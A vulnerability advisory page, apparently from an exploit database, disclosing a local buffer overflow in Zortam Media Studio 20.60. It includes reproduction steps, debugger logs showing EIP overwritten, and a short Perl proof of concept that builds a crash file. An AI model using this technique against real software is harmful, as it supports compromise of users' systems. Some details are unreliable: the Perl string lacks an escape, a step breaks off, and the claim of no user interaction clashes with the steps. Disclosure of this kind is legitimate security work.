Lucene search
K

Zortam Media Studio 20.60 - Buffer Overflow Vulnerability

🗓️ 05 Oct 2016 00:00:00Reported by ZwXType 
zdt
 zdt
🔗 0day.today👁 27 Views

Buffer overflow vulnerability in Zortam Media Studio 20.60 allows local attackers to compromise the software process and manipulate the computer system. Exploitation results in computer system manipulation and compromise. Manual steps to reproduce the vulnerability provided

Code
Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered in the official Zortam MP3 Media Studio 20.60 software.
The vulnerability allows local attackers to overwrite the registers to compromise the local software process.

The classic buffer overflow vulnerability is located in the software Zortam mp3. An attacker can manipulate the 
bit EIP register in order to execute the next instruction of their choice. Attackers are able to for example 
execute arbitrary codes with process privileges. The attacker includes a large unicode string to overwrite 
the EIP register of the process. Finally the attacker is able to takeover the process by an overwrite of the 
active program process to compromise the computer system.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability 
scoring system) count of 6.5. Exploitation of the vulnerability requires a low privilege or restricted system 
user account without user interaction. Successful exploitation of the vulnerability results in computer system 
manipulation and compromise of the computer system.


Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Launch Zortam mp3.exe                
2. Run the code in perl and a file format (.txt) will create
3. Click on search media to mp3
4. Open File .(.txt)
5. Copy and paste characters string AAAAAAAAAAA+ ... in input "Selects" and click the button "OK".
6. Software will crash with 
7. Successful reproduce of the local buffer overflow vulnerability!


--- Debug Logs ---
Access violation - code c0000005
eax=00000000 ebx=00000000 ecx=41414141 edx=776138a0 esi=00000000 edi=00000000
eip=41414141 esp=0014cf98 ebp=0014cfb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
41414141 ??              ???
-
0:000> !exchain
0014cfac: ntdll!RtlConvertUlongToLargeInteger+b0 (776138a0)
0014d3b4: ntdll!RtlConvertUlongToLargeInteger+b0 (776138a0)
0014da6c: 41414141
Invalid exception stack at 41414141
-
0:000> d 0014da6c
0014da6c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014da7c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014da8c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014da9c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014daac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014dabc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014dacc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014dadc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

Note: EIP and ECX overwritten!


PoC: Perl Exploit
#!/usr/bin/perl
my $Buff = "x41" x 2000;
open(MYFILE,'>>File.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC created by ZwX\n";


Domain:     www.zwx.fr
Contact:    [email protected]	
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
            cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
            0day.today/author/27461

#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation